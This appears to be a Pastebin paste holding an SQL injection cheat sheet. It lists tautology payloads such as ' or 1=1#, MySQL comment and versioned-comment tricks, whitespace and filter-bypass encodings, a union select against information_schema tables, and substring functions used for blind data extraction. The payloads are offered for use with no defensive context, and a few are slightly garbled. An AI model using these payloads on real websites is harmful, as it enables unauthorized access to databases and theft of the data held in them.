Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL COMMENTS
- ‘ or 1=1#‘ or 1=1– –‘ or 1=1/* (MySQL < 5.1)
- ' or 1=1;%00
- ' or 1=1 union select 1,2 as `
- ' or#newline1='1'
- or– -newline1='1'
- /*!50000or*/1='1'
- /*!or*/1='1
- [-----------------------------------------------------]
- PREFIXES
- + – ~ !
- ‘ or –+2=- -!!!’2
- [-----------------------------------------------------]
- OPERATORS
- ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,,
- XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST,
- GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND,
- OR, BINARY,BETWEEN, ISNULL
- [-----------------------------------------------------]
- WHITESPACES
- %20 %09 %0a %0b %0c %0d %a0 /**/
- ‘or+(1)sounds/**/like“1“–%a0-
- ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
- [-----------------------------------------------------]
- No Whitespace Bypass Using Comments
- ?id=1/*comment*/and/**/1=1/**/--
- No Whitespace Bypass Using Parenthesis
- ?id=(1)and(1)=(1)--
- [-----------------------------------------------------]
- EXTRACT SUBSTRINGS
- substr(‘abc’,1,1) = ‘a’
- substr(‘abc’ from 1 for 1) = ‘a’
- substring(‘abc’,1,1) = ‘a’
- substring(‘abc’ from 1 for 1) = ‘a’
- mid(‘abc’,1,1) = ‘a’
- mid(‘abc’ from 1 for 1) = ‘a’
- lpad(‘abc’,1,space(1)) = ‘a’
- rpad(‘abc’,1,space(1)) = ‘a’
- left(‘abc’,1) = ‘a’
- reverse(right(reverse(‘abc’),1)) = ‘a’
- insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
- space(0) = trim(version()from(version()))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
